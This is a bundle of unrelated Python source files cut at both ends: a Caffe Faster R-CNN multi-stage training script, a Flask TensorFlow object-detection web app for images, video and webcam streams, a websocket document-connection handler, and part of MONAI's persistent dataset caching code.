get_solvers(net_name): # Faster R-CNN Alternating Optimization n = 'faster_rcnn_alt_opt_800' # Solver for each training stage solvers = [[net_name, n, 'stage1_rpn_solver60k80k.pt'], [net_name, n, 'stage1_fast_rcnn_solver30k40k.pt'], [net_name, n, 'stage2_rpn_solver60k80k.pt'], [net_name, n, 'stage2_fast_rcnn_solver30k40k.pt']] solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers] # Iterations for each training stage max_iters = [80000, 40000, 80000, 40000] #max_iters = [100, 100, 100, 100] # Test prototxt for the RPN rpn_test_prototxt = os.path.join( cfg.MODELS_DIR, net_name, n, 'rpn_test.pt') return solvers, max_iters, rpn_test_prototxt # ------------------------------------------------------------------------------ # Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded # (e.g. "del net" in Python code). To work around this issue, each training # stage is executed in a separate process using multiprocessing.Process. # ------------------------------------------------------------------------------ def _init_caffe(cfg): """Initialize pycaffe in a training process. """ import caffe # fix the random seeds (numpy and caffe) for reproducibility np.random.seed(cfg.RNG_SEED) caffe.set_random_seed(cfg.RNG_SEED) # set up caffe caffe.set_mode_gpu() caffe.set_device(cfg.GPU_ID) def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None, max_iters=None, cfg=None): """Train a Region Proposal Network in a separate training process. """ # Not using any proposals, just ground-truth boxes cfg.TRAIN.HAS_RPN = True cfg.TRAIN.BBOX_REG = False # applies only to Fast R-CNN bbox regression cfg.TRAIN.PROPOSAL_METHOD = 'gt' cfg.TRAIN.IMS_PER_BATCH = 1 print 'Init model: {}'.format(init_model) print('Using config:') pprint.pprint(cfg) import caffe _init_caffe(cfg) roidb, imdb = get_roidb(imdb_name) print 'roidb len: {}'.format(len(roidb)) output_dir = get_output_dir(imdb) print 'Output will be saved to `{:s}`'.format(output_dir) model_paths = train_net(solver, roidb, output_dir, pretrained_model=init_model, max_iters=max_iters) # Cleanup all but the final model for i in model_paths[:-1]: os.remove(i) rpn_model_path = model_paths[-1] # Send final model path through the multiprocessing queue queue.put({'model_path': rpn_model_path}) def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None, rpn_test_prototxt=None): """Use a trained RPN to generate proposals. """ cfg.TEST.RPN_PRE_NMS_TOP_N = -1 # no pre NMS filtering cfg.TEST.RPN_POST_NMS_TOP_N = 2000 # limit top boxes after NMS print 'RPN model: {}'.format(rpn_model_path) print('Using config:') pprint.pprint(cfg) import caffe _init_caffe(cfg) # NOTE: the matlab implementation computes proposals on flipped images, too. # We compute them on the image once and then flip the already computed # proposals. This might cause a minor loss in mAP (less proposal jittering). imdb = get_imdb(imdb_name) print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name) # Load RPN and configure output directory rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST) output_dir = get_output_dir(imdb) print 'Output will be saved to `{:s}`'.format(output_dir) # Generate proposals on the imdb rpn_proposals = imdb_proposals(rpn_net, imdb) # Write proposals to disk and send the proposal file path through the # multiprocessing queue rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0] rpn_proposals_path = os.path.join( output_dir, rpn_net_name + '_proposals.pkl') with open(rpn_proposals_path, 'wb') as f: cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL) print 'Wrote RPN proposals to {}'.format(rpn_proposals_path) queue.put({'proposal_path': rpn_proposals_path}) def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None, max_iters=None, cfg=None, rpn_file=None): """Train a Fast R-CNN using proposals generated by an RPN. """ cfg.TRAIN.HAS_RPN = False # not generating prosals on-the-fly cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead cfg.TRAIN.IMS_PER_BATCH = 2 print 'Init model: {}'.format(init_model) print 'RPN proposals: {}'.format(rpn_file) print('Using config:') pprint.pprint(cfg) import caffe _init_caffe(cfg) roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file) output_dir = get_output_dir(imdb) print 'Output will be saved to `{:s}`'.format(output_dir) # Train Fast R-CNN model_paths = train_net(solver, roidb, output_dir, pretrained_model=init_model, max_iters=max_iters) # Cleanup all but the final model for i in model_paths[:-1]: os.remove(i) fast_rcnn_model_path = model_paths[-1] # Send Fast R-CNN model path over the multiprocessing queue queue.put({'model_path': fast_rcnn_model_path}) if __name__ == '__main__': args = parse_args() print('Called with args:') print(args) if args.cfg_file is not None: cfg_from_file(args.cfg_file) if args.set_cfgs is not None: cfg_from_list(args.set_cfgs) cfg.GPU_ID = args.gpu_id # -------------------------------------------------------------------------- # Pycaffe doesn't reliably free GPU memory when instantiated nets are # discarded (e.g. "del net" in Python code). To work around this issue, each # training stage is executed in a separate process using # multiprocessing.Process. # -------------------------------------------------------------------------- # queue for communicated results between processes mp_queue = mp.Queue() # solves, iters, etc. for each training stage solvers, max_iters, rpn_test_prototxt = get_solvers(args.net_name) print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' print 'Stage 1 RPN, init from ImageNet model' print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' cfg.TRAIN.SNAPSHOT_INFIX = 'stage1' mp_kwargs = dict( queue=mp_queue, imdb_name=args.imdb_name, init_model=args.pretrained_model, solver=solvers[0], max_iters=max_iters[0], cfg=cfg) p = mp.Process(target=train_rpn, kwargs=mp_kwargs) p.start() rpn_stage1_out = mp_queue.get() p.join() print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' print 'Stage 1 RPN, generate proposals' print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' mp_kwargs = dict( queue=mp_queue, imdb_name=args.imdb_name, rpn_model_path=str(rpn_stage1_out['model_path']), cfg=cfg, rpn_test_prototxt=rpn_test_prototxt) p = mp.Process(target=rpn_generate, kwargs=mp_kwargs) p.start() rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path'] p.join() print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' print 'Stage 1 Fast R-CNN using RPN proposals, init from ImageNet model' print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' cfg.TRAIN.SNAPSHOT_INFIX = 'stage1' mp_kwargs = dict( queue=mp_queue, imdb_name=args.imdb_name, init_model=args.pretrained_model, solver=solvers[1], max_iters=max_iters[1], cfg=cfg, rpn_file=rpn_stage1_out['proposal_path']) p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs) p.start() fast_rcnn_stage1_out = mp_queue.get() p.join() print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' print 'Stage 2 RPN, init from stage 1 Fast R-CNN model' print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' cfg.TRAIN.SNAPSHOT_INFIX = 'stage2' mp_kwargs = dict( queue=mp_queue, imdb_name=args.imdb_name, init_model=str(fast_rcnn_stage1_out['model_path']), solver=solvers[2], max_iters=max_iters[2], cfg=cfg) p = mp.Process(target=train_rpn, kwargs=mp_kwargs) p.start() rpn_stage2_out = mp_queue.get() p.join() print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' print 'Stage 2 RPN, generate proposals' print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' mp_kwargs = dict( queue=mp_queue, imdb_name=args.imdb_name, rpn_model_path=str(rpn_stage2_out['model_path']), cfg=cfg, rpn_test_prototxt=rpn_test_prototxt) p = mp.Process(target=rpn_generate, kwargs=mp_kwargs) p.start() rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path'] p.join() print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' print 'Stage 2 Fast R-CNN, init from stage 2 RPN R-CNN model' print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' cfg.TRAIN.SNAPSHOT_INFIX = 'stage2' mp_kwargs = dict( queue=mp_queue, imdb_name=args.imdb_name, init_model=str(rpn_stage2_out['model_path']), solver=solvers[3], max_iters=max_iters[3], cfg=cfg, rpn_file=rpn_stage2_out['proposal_path']) p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs) p.start() fast_rcnn_stage2_out = mp_queue.get() p.join() # Create final model (just a copy of the last stage) final_path = os.path.join( os.path.dirname(fast_rcnn_stage2_out['model_path']), args.net_name + '_faster_rcnn_final.caffemodel') print 'cp {} -> {}'.format( fast_rcnn_stage2_out['model_path'], final_path) shutil.copy(fast_rcnn_stage2_out['model_path'], final_path) print 'Final model: {}'.format(final_path)
detector_app.py
import io import base64 import sys import tempfile import cv2 import time import argparse import datetime import numpy as np from queue import Queue from threading import Thread MODEL_BASE = '/home/anoop/models/research' sys.path.append(MODEL_BASE) sys.path.append(MODEL_BASE + '/object_detection') sys.path.append(MODEL_BASE + '/slim') from flask import Flask from flask import redirect from flask import render_template from flask import request from flask import Response from flask import url_for from flask import session from flask_wtf.file import FileField import numpy as np from PIL import Image from PIL import ImageDraw import tensorflow as tf from utils import label_map_util from utils import visualization_utils as vis_util from werkzeug.datastructures import CombinedMultiDict from wtforms import Form from wtforms import ValidationError from cv2 import imencode from app_utils import draw_boxes_and_labels app = Flask(__name__) PATH_TO_CKPT = '/home/anoop/tensorflow/ssd_inception_v2_coco_11_06_2017/frozen_inference_graph.pb' PATH_TO_LABELS = MODEL_BASE + '/object_detection/data/mscoco_label_map.pbtxt' content_types = {'jpg': 'image/jpeg', 'jpeg': 'image/jpeg', 'png': 'image/png'} extensions = sorted(content_types.keys()) # Helper Functions class FPS: def __init__(self): # store the start time, end time, and total number of frames # that were examined between the start and end intervals self._start = None self._end = None self._numFrames = 0 def start(self): # start the timer self._start = datetime.datetime.now() return self def stop(self): # stop the timer self._end = datetime.datetime.now() def update(self): # increment the total number of frames examined during the # start and end intervals self._numFrames += 1 def elapsed(self): # return the total number of seconds between the start and # end interval return (self._end - self._start).total_seconds() def fps(self): # compute the (approximate) frames per second return self._numFrames / self.elapsed() class WebcamVideoStream: def __init__(self, src, width, height): # initialize the video camera stream and read the first frame # from the stream self.src = src self.width = width self.height = height #self.stream = cv2.VideoCapture(src) #self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width) #self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height) #(self.grabbed, self.frame) = self.stream.read() # initialize the variable used to indicate if the thread should # be stopped self.stopped = False def init(self): self.stream = cv2.VideoCapture(self.src) self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, self.width) self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, self.height) (self.grabbed, self.frame) = self.stream.read() def start(self): # start the thread to read frames from the video stream self.camthread = Thread(target=self.update, args=()) self.camthread.start() return self def update(self): # keep looping infinitely until the thread is stopped while True: # if the thread indicator variable is set, stop the thread if self.stopped: self.stream.release() return # otherwise, read the next frame from the stream (self.grabbed, self.frame) = self.stream.read() def read(self): # return the frame most recently read return self.frame def stop(self): # indicate that the thread should be stopped self.stopped = True def is_image(): def _is_image(form, field): if not field.data: raise ValidationError() elif field.data.filename.split('.')[-1].lower() not in extensions: raise ValidationError() return _is_image def draw_bounding_box_on_image(image, box, color='red', thickness=4): draw = ImageDraw.Draw(image) im_width, im_height = image.size ymin, xmin, ymax, xmax = box (left, right, top, bottom) = (xmin * im_width, xmax * im_width, ymin * im_height, ymax * im_height) draw.line([(left, top), (left, bottom), (right, bottom), (right, top), (left, top)], width=thickness, fill=color) def encode_image(image): image_buffer = io.BytesIO() image.save(image_buffer, format='PNG') mime_str = 'data:image/png;base64,' imgstr = '{0!s}'.format(base64.b64encode(image_buffer.getvalue())) quote_index = imgstr.find("b'") end_quote_index = imgstr.find("'", quote_index+2) imgstr = imgstr[quote_index+2:end_quote_index] imgstr = mime_str + imgstr #imgstr = 'data:image/png;base64,{0!s}'.format( #base64.b64encode(image_buffer.getvalue())) return imgstr # Webcam feed Helper def worker(input_q, output_q): detection_graph = client.detection_graph sess = client.sess fps = FPS().start() while True: fps.update() frame = input_q.get() frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) output_q.put(detect_objects_webcam(frame_rgb, sess, detection_graph)) fps.stop() sess.close() # detector for web camera def detect_objects_webcam(image_np, sess, detection_graph): # Expand dimensions since the model expects images to have shape: [1, None, None, 3] image_np_expanded = np.expand_dims(image_np, axis=0) image_tensor = detection_graph.get_tensor_by_name('image_tensor:0') # Each box represents a part of the image where a particular object was detected. boxes = detection_graph.get_tensor_by_name('detection_boxes:0') # Each score represent how level of confidence for each of the objects. # Score is shown on the result image, together with the class label. scores = detection_graph.get_tensor_by_name('detection_scores:0') classes = detection_graph.get_tensor_by_name('detection_classes:0') num_detections = detection_graph.get_tensor_by_name('num_detections:0') # Actual detection. (boxes, scores, classes, num_detections) = sess.run( [boxes, scores, classes, num_detections], feed_dict={image_tensor: image_np_expanded}) # Visualization of the results of a detection. rect_points, class_names, class_colors = draw_boxes_and_labels( boxes=np.squeeze(boxes), classes=np.squeeze(classes).astype(np.int32), scores=np.squeeze(scores), category_index=client.category_index, min_score_thresh=.5 ) return dict(rect_points=rect_points, class_names=class_names, class_colors=class_colors) # Image class class PhotoForm(Form): input_photo = FileField( 'File extension should be: %s (case-insensitive)' % ', '.join(extensions), validators=[is_image()]) class VideoForm(Form): input_video = FileField() # Obect Dection Class class ObjectDetector(object): def __init__(self): self.detection_graph = self._build_graph() self.sess = tf.Session(graph=self.detection_graph) label_map = label_map_util.load_labelmap(PATH_TO_LABELS) categories = label_map_util.convert_label_map_to_categories( label_map, max_num_classes=90, use_display_name=True) self.category_index = label_map_util.create_category_index(categories) def _build_graph(self): detection_graph = tf.Graph() with detection_graph.as_default(): od_graph_def = tf.GraphDef() with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid: serialized_graph = fid.read() od_graph_def.ParseFromString(serialized_graph) tf.import_graph_def(od_graph_def, name='') return detection_graph def _load_image_into_numpy_array(self, image): (im_width, im_height) = image.size return np.array(image.getdata()).reshape( (im_height, im_width, 3)).astype(np.uint8) def detect(self, image): image_np = self._load_image_into_numpy_array(image) image_np_expanded = np.expand_dims(image_np, axis=0) graph = self.detection_graph image_tensor = graph.get_tensor_by_name('image_tensor:0') boxes = graph.get_tensor_by_name('detection_boxes:0') scores = graph.get_tensor_by_name('detection_scores:0') classes = graph.get_tensor_by_name('detection_classes:0') num_detections = graph.get_tensor_by_name('num_detections:0') (boxes, scores, classes, num_detections) = self.sess.run( [boxes, scores, classes, num_detections], feed_dict={image_tensor: image_np_expanded}) boxes, scores, classes, num_detections = map( np.squeeze, [boxes, scores, classes, num_detections]) return boxes, scores, classes.astype(int), num_detections.astype(int) # Detection function def detect_objects(image_path): image = Image.open(image_path).convert('RGB') boxes, scores, classes, num_detections = client.detect(image) image.thumbnail((480, 480), Image.ANTIALIAS) new_images = {} for i in range(num_detections): if scores[i] < 0.7: continue cls = classes[i] if cls not in new_images.keys(): new_images[cls] = image.copy() draw_bounding_box_on_image(new_images[cls], boxes[i], thickness=int(scores[i]*10)-4) result = {} result['original'] = encode_image(image.copy()) for cls, new_image in new_images.items(): category = client.category_index[cls]['name'] result[category] = encode_image(new_image) return result @app.route('/') def main_display(): photo_form = PhotoForm(request.form) video_form = VideoForm(request.form) #return render_template('main.html', photo_form=photo_form, result={}) return render_template('main.html', photo_form=photo_form, video_form=video_form, result={}) @app.route('/imgproc', methods=['GET', 'POST']) def imgproc(): video_form = VideoForm(request.form) form = PhotoForm(CombinedMultiDict((request.files, request.form))) if request.method == 'POST' and form.validate(): with tempfile.NamedTemporaryFile() as temp: form.input_photo.data.save(temp) temp.flush() print(temp.name) result = detect_objects(temp.name) photo_form = PhotoForm(request.form) return render_template('main.html', photo_form=photo_form, video_form=video_form, result=result) else: return redirect(url_for('main_display')) @app.route('/vidproc', methods=['GET', 'POST']) def vidproc(): print("In vidproc") form = VideoForm(CombinedMultiDict((request.files, request.form))) if request.method == 'POST': print("vid sub") with tempfile.NamedTemporaryFile(delete=False) as temp: form.input_video.data.save(temp) temp.flush() session['vid'] = temp.name return render_template('video.html') @app.route('/vidpros') def vidpros(): graph = client.detection_graph image_tensor = graph.get_tensor_by_name('image_tensor:0') boxes = graph.get_tensor_by_name('detection_boxes:0') scores = graph.get_tensor_by_name('detection_scores:0') classes = graph.get_tensor_by_name('detection_classes:0') num_detections = graph.get_tensor_by_name('num_detections:0') vid_source = cv2.VideoCapture(session['vid']) print("vid src") def generate(image_tensor, boxes, scores, classes, num_detections): ret, frame = vid_source.read() # tensor code while ret: #image_np = client._load_image_into_numpy_array(frame) image_np_expanded = np.expand_dims(frame, axis=0) (boxes_t, scores_t, classes_t, num_detections_t) = client.sess.run( [boxes, scores, classes, num_detections], feed_dict={image_tensor: image_np_expanded}) vis_util.visualize_boxes_and_labels_on_image_array( frame, np.squeeze(boxes_t), np.squeeze(classes_t).astype(np.int32), np.squeeze(scores_t), client.category_index, use_normalized_coordinates=True, line_thickness=8) #image_pil = Image.fromarray(np.uint8(frame)).convert('RGB') payload = cv2.imencode('.jpg', frame)[1].tobytes() yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + payload + b'\r\n') ret, frame = vid_source.read() print("Before return") return Response(generate(image_tensor, boxes, scores, classes, num_detections), mimetype='multipart/x-mixed-replace; boundary=frame') @app.route('/realproc', methods=['GET', 'POST']) def realproc(): return render_template('realtime.html') @app.route('/realstop', methods=['GET', 'POST']) def realstop(): photo_form = PhotoForm(request.form) video_form = VideoForm(request.form) if request.method == 'POST': print("In - Stop - POST") if request.form['realstop'] == 'Stop Web Cam': print(request.form['realstop']) fps_init.stop() video_init.stop() video_init.update() print("Stopped") return render_template('main.html', photo_form=photo_form, video_form=video_form) @app.route('/realpros') def realpros(): print("in real pros") input_q = Queue(5) output_q = Queue() for i in range(1): t = Thread(target=worker, args=(input_q, output_q)) t.daemon = True t.start() video_init.init() video_capture = video_init.start() fps = fps_init.start() def generate(): print("in gen real pros") frame = video_capture.read() while video_capture.grabbed: print("in while gen real pros") input_q.put(frame) t = time.time() if output_q.empty(): pass else: font = cv2.FONT_HERSHEY_SIMPLEX data = output_q.get() rec_points = data['rect_points'] class_names = data['class_names'] class_colors = data['class_colors'] for point, name, color in zip(rec_points, class_names, class_colors): cv2.rectangle(frame, (int(point['xmin'] * 480), int(point['ymin'] * 360)), (int(point['xmax'] * 480), int(point['ymax'] * 360)), color, 3) cv2.rectangle(frame, (int(point['xmin'] * 480), int(point['ymin'] * 360)), (int(point['xmin'] * 480) + len(name[0]) * 6, int(point['ymin'] * 360) - 10), color, -1, cv2.LINE_AA) cv2.putText(frame, name[0], (int(point['xmin'] * 480), int(point['ymin'] * 360)), font, 0.3, (0, 0, 0), 1) payload = cv2.imencode('.jpg', frame)[1].tobytes() yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + payload + b'\r\n') frame = video_capture.read() #video_capture.update() print("out of while") fps.update() return Response(generate(), mimetype='multipart/x-mixed-replace; boundary=frame') client = ObjectDetector() video_init = WebcamVideoStream(src=1, width=480, height=360) fps_init = FPS() app.secret_key = 'super secret key' app.config['SESSION_TYPE'] = 'filesystem' if __name__ == '__main__': app.secret_key = 'super secret key' app.config['SESSION_TYPE'] = 'filesystem' sess.init_app(app) app.run(host='0.0.0.0', port=80, debug=False)
connection.py
from json import dumps, loads from logging import getLogger from threading import Thread from .api import aggregate from .protocol import * __all__ = ["Connection"] class Connection(object): """Handles an open connection between the server and the JS client.""" def __init__(self, socket, database): self._socket = socket self._client = "%04d" % (id(self._socket) % 10000) self._state = STATE_WAITING self._database = database self._document = None self._processed = [] self._logger = getLogger("gunicorn.error") self._log("INFO", "Connection opened.") def _log(self, event, data): """Send a debug message to the terminal.""" events = { "INFO": (self._logger.info, u"\x1b[33m{0} \x1b[36m!!\x1b[0m {1}"), "SEND": (self._logger.debug, u"\x1b[33m{0} \x1b[31m<-\x1b[0m {1}"), "RECV": (self._logger.debug, u"\x1b[33m{0} \x1b[32m->\x1b[0m {1}") } func, template = events[event] func(template.format(self._client, data).encode("utf8")) def _send(self, verb, payload=None): """Send data to the client.""" data = (verb + " " + payload) if payload else verb self._log("SEND", data) self._socket.send(data) def _error(self, reply=REPLY_INVALID): """Client has sent bad data; close the connection with an error.""" self._state = STATE_CLOSING self._send(SVERB_INVALID, reply) def _handle_keywords(self, keywords): """Handle a keyword update in the document. Maybe reply with stuff.""" def inner(): for keyword in keywords: if keyword in self._processed: continue self._processed.append(keyword) for box in aggregate(keyword): if self._state != STATE_READY: return self._send(SVERB_UPDATE, dumps(box)) thread = Thread(target=inner) thread.daemon = True thread.start() def _handle_state_waiting(self, verb, data): """Handle input from the client when in the "waiting" state.""" if verb == CVERB_OPEN: self._state = STATE_READY self._document = doc = self._database.get_document(data) if not doc: self._error(REPLY_NODOC) return payload = {"title": doc.title, "text": doc.text} self._send(SVERB_READY, dumps(payload)) self._handle_keywords(doc.keywords) if not self._database.lock_document(doc.docid): self._error(REPLY_LOCKED) del self._document return else: self._error() def _handle_state_ready(self, verb, data): """Handle input from the client when in the "ready" state.""" if verb == CVERB_UPDATE: try: data = loads(data) except ValueError: self._error() return if "title" in data: self._document.title = data["title"] if "text" in data: self._document.text = data["text"] if "keywords" in data: self._handle_keywords(data["keywords"]) self._database.save_document(self._document) elif verb == CVERB_CLOSE: self._state = STATE_CLOSING self._send(SVERB_BYE) else: self._error() def handle(self): """Handle the main server/client connection loop.""" while self._state != STATE_CLOSING: data = self._socket.receive() if data is None: self._state = STATE_CLOSING break data = data.strip() self._log("RECV", data) if not data: self._error() break try: verb, data = data.split(" ", 1) except ValueError: verb, data = data, None if self._state == STATE_WAITING: self._handle_state_waiting(verb, data) elif self._state == STATE_READY: self._handle_state_ready(verb, data) def finish(self): """Close the connection and save all data.""" if self._document: self._database.save_document(self._document) self._database.unlock_document(self._document.docid) self._log("INFO", "Connection closed.")
dataset.py
# Copyright 2020 - 2021 MONAI Consortium # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import collections.abc import math import pickle import shutil import sys import tempfile import threading import time import warnings from copy import deepcopy from multiprocessing.pool import ThreadPool from pathlib import Path from typing import IO, TYPE_CHECKING, Any, Callable, Dict, List, Optional, Sequence, Union import numpy as np import torch from torch.utils.data import Dataset as _TorchDataset from torch.utils.data import Subset from monai.data.utils import convert_tables_to_dicts, first, pickle_hashing from monai.transforms import Compose, Randomizable, ThreadUnsafe, Transform, apply_transform from monai.utils import MAX_SEED, ensure_tuple, get_seed, min_version, optional_import if TYPE_CHECKING: from tqdm import tqdm has_tqdm = True else: tqdm, has_tqdm = optional_import("tqdm", "4.47.0", min_version, "tqdm") lmdb, _ = optional_import("lmdb") pd, _ = optional_import("pandas") class Dataset(_TorchDataset): """ A generic dataset with a length property and an optional callable data transform when fetching a data sample. If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`, for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset For example, typical input data can be a list of dictionaries:: [{ { { 'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz', 'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz', 'extra': 123 'extra': 456 'extra': 789 }, }, }] """ def __init__(self, data: Sequence, transform: Optional[Callable] = None) -> None: """ Args: data: input data to load and transform to generate dataset for model. transform: a callable data transform on input data. """ self.data = data self.transform = transform def __len__(self) -> int: return len(self.data) def _transform(self, index: int): """ Fetch single data item from `self.data`. """ data_i = self.data[index] return apply_transform(self.transform, data_i) if self.transform is not None else data_i def __getitem__(self, index: Union[int, slice, Sequence[int]]): """ Returns a `Subset` if `index` is a slice or Sequence, a data item otherwise. """ if isinstance(index, slice): # dataset[:42] start, stop, step = index.indices(len(self)) indices = range(start, stop, step) return Subset(dataset=self, indices=indices) if isinstance(index, collections.abc.Sequence): # dataset[[1, 3, 4]] return Subset(dataset=self, indices=index) return self._transform(index) class PersistentDataset(Dataset): """ Persistent storage of pre-computed values to efficiently manage larger than memory dictionary format data, it can operate transforms for specific fields. Results from the non-random transform components are computed when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses. If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`, for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset For example, typical input data can be a list of dictionaries:: [{ { { 'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz', 'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz', 'extra': 123 'extra': 456 'extra': 789 }, }, }] For a composite transform like .. code-block:: python [ LoadImaged(keys=['image', 'label']), Orientationd(keys=['image', 'label'], axcodes='RAS'), ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True), RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96), pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0), ToTensord(keys=['image', 'label'])] Upon first use a filename based dataset will be processed by the transform for the [LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to the `cache_dir` before applying the remaining random dependant transforms [RandCropByPosNegLabeld, ToTensord] elements for use in the analysis. Subsequent uses of a dataset directly read pre-processed results from `cache_dir` followed by applying the random dependant parts of transform processing. Note: The input data must be a list of file paths and will hash them as cache keys. When loading persistent cache content, it can't guarantee the cached data matches current transform chain, so please make sure to use exactly the same non-random transforms and the args as the cache content, otherwise, it may cause unexpected errors. """ def __init__( self, data: Sequence, transform: Union[Sequence[Callable], Callable], cache_dir: Optional[Union[Path, str]], hash_func: Callable[..., bytes] = pickle_hashing, ) -> None: """ Args: data: input data file paths to load and transform to generate dataset for model. `PersistentDataset` expects input data to be a list of serializable and hashes them as cache keys using `hash_func`. transform: transforms to execute operations on input data. cache_dir: If specified, this is the location for persistent storage of pre-computed transformed data tensors. The cache_dir is computed once, and persists on disk until explicitly removed. Different runs, programs, experiments may share a common cache dir provided that the transforms pre-processing is consistent. If `cache_dir` doesn't exist, will automatically create it. If `cache_dir` is `None`, there is effectively no caching. hash_func: a callable to compute hash from data items to be cached. defaults to `monai.data.utils.pickle_hashing`. """ if not isinstance(transform, Compose): transform = Compose(transform) super().__init__(data=data, transform=transform) self.cache_dir = Path(cache_dir) if cache_dir is not None else None self.hash_func = hash_func if self.cache_dir is not None: if not self.cache_dir.exists(): self.cache_dir.mkdir(parents=True, exist_ok=True) if not self.cache_dir.is_dir(): raise ValueError("cache_dir must be a directory.") def _pre_transform(self, item_transformed): """ Process the data from original state up to the first random element. Args: item_transformed: The data to be transformed Returns: the transformed element up to the first identified random transform object """ for _transform in self.transform.transforms: # type:ignore # execute all the deterministic transforms if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform): break # this is to be consistent with CacheDataset even though it's not in a multi-thread situation. _xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform item_transformed = apply_transform(_xform, item_transformed) return item_transformed def _post_transform(self, item_transformed): """ Process the data from before the first random transform to the final state ready for evaluation. Args: item_transformed: The data to be transformed (already processed up to the first random transform) Returns: the transformed element through the random transforms """ if not isinstance(self.transform, Compose): raise ValueError("transform must be an instance of monai.transforms.Compose.") start_post_randomize_run = False for _transform in self.transform.transforms: if ( start_post_randomize_run or isinstance(_transform, Randomizable) or not isinstance(_transform, Transform) ): start_post_randomize_run = True item_transformed = apply_transform(_transform, item_transformed) return item_transformed def _cachecheck(self, item_transformed): """ A function to cache the expensive input data transform operations so that huge data sets (larger than computer memory) can be processed on the fly as needed, and intermediate results written to disk for future use. Args: item_transformed: The current data element to be mutated into transformed representation Returns: The transformed data_element, either from cache, or explicitly computing it. Warning: The current implementation does not encode transform information as part of the hashing mechanism used for generating cache names. If the transforms applied are changed in any way, the objects in the cache dir will be invalid. The hash for the cache is ONLY dependant on the input filename paths. """ hashfile = None if self.cache_dir is not None: data_item_md5 = self.hash_func(item_transformed).decode("utf-8") hashfile = self.cache_dir / f"{data_item_md5}.pt" if hashfile is not None and hashfile.is_file(): # cache hit try: return torch.load(hashfile) except PermissionError as e: if sys.platform == "win32": pass # windows machine multiprocessing not efficiently supported else: raise e _item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed if hashfile is not None: # NOTE: Writing to a temporary directory and then using a nearly atomic rename operation # to make the cache more robust to manual killing of parent process # which may leave partially written cache files in an incomplete state with tempfile.TemporaryDirectory() as tmpdirname: temp_hash_file = Path(tmpdirname) / hashfile.name torch.save(_item_transformed, temp_hash_file) if temp_hash_file.is_file() and not hashfile.is_file(): # On Unix, if target exists and is a file, it will be replaced silently if the user has permission. # for more details: https://docs.python.org/3/library/shutil.html#shutil.move. try: shutil.move(temp_hash_file, hashfile) except FileExistsError: pass return _item_transformed def _transform(self, index: int): pre_random_item = self._cachecheck(self.data[index]) return self._post_transform(pre_random_item) class 